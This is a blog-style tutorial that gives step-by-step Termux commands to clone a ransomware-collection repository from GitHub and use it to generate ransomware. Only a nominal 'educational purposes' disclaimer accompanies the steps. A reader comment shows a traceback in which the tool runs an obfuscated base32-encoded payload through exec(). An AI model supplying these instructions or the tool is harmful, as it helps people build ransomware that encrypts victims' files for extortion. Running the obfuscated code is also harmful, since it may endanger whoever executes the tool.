HomeRansomwareRansomware Collection Don't Run Them on Your Device

Ransomware Collection Don’t Run Them on Your Device

Ransomware Collection – The termux ransomware tool will be discussed in this post. We have already discussed several tools, and if you are wondering how this tool replaces them, this tool includes many collections from which you may select the one that best suits you.

Let us first define ransomware. Ransomware is a sort of malware assault in which the attacker encrypts and locks the victim’s data, essential files, and then demands money to open and decode the data.

The ransomware tool that we will examine has a variety of ransomware viruses; it is totally developed using shell and python programming; and it is quite simple to use in termux.

Install ransomware collection tool on termux

Step 1) To begin downloading this utility in our termux application, copy the following command and paste it into your termux, then hit the enter button.

				
					git clone https://github.com/Err0r-ICA/Ransomware.git
				
			
Ransomware Collection Don’t Run Them on Your Device.
Output for downloding the tool on termux

Step 2) After downloading the ransomware collection tool in your termux, you must change your directory to that tool’s directory by using the command below.

				
					cd Ransomware
				
			
Ransomware Collection Don’t Run Them on Your Device.
Output for changing the directory

Step 3) To execute this ransomware programme, enter the following command into your termux terminal.

				
					python3 Ransomware
				
			
Ransomware Collection Don’t Run Them on Your Device.
Output for executing the tool

Step 4) After you run the ransomware software, input 1 in your termux and hit the enter button; your ransomware virus will be formed as a result.

Ransomware Collection Don’t Run Them on Your Device.
Output for creating ransomware virus

The ransomware virus you produced will be saved to your SD card in zip format, and you should not forget that you can launch this infection on your device.

Ransomware Collection Don’t Run Them on Your Device.

Disclaimer: This post is solely for educational purposes, and we are not liable if you use it for illicit purposes.

I hope you found this post useful, and please share it with your friends. If you have any questions regarding it, please contact me using the form below.

RELATED ARTICLES

3 Comments

  1. Traceback (most recent call last):
    File “/data/data/com.termux/files/home/Ransomware/test2.py”, line 2, in
    exec(base64.b32decode(“MZZG63JAORUHEZLBMRUW4ZZANFWXA33SOQQFI2DSMVQWICQKNFWXA33SOQQHOYLSNZQQUZTSN5WSA53BOJXGCIDJNVYG64TUEBYGK3DBNZTWSCQKNFWXA33SOQQHI2LNMUFAU5BRHVKGQ4TFMFSCQ5DBOJTWK5B5OBSWYYLOM5USYIDBOJTXGPJIEJGE6QKEJFHEOIRMJZXW4ZJMGEUSSCTUGEXHG5DBOJ2CQKIKBJSGKZRAMRXSQKJ2BIQCAIBAEAQCAIDJNVYG64TUEB3WC4TOMEWHEZLROVSXG5DTBIQCAIBAEAQCAIDSHVZGK4LVMVZXI4ZOM5SXIKBHNB2HI4DTHIXS63TVOVRGSLTIMVZG623VMFYHALTDN5WSOKJAENSG6IDTN5WWK5DINFXGOCRAEAQCAIBAEAQHOYLSNZQS443UN5YD2VDSOVSQUIBAEAQCAIBAEBZGK5DVOJXCA4QKOJ2W4PLEN4UCSCTQOJUW45BIOJ2W4KIK”))
    File “”, line 16, in
    File “”, line 12, in do
    ModuleNotFoundError: No module named ‘requests’

Leave A Reply

Please enter your comment!
Please enter your name here
Captcha verification failed!
CAPTCHA user score failed. Please contact us!

Most Popular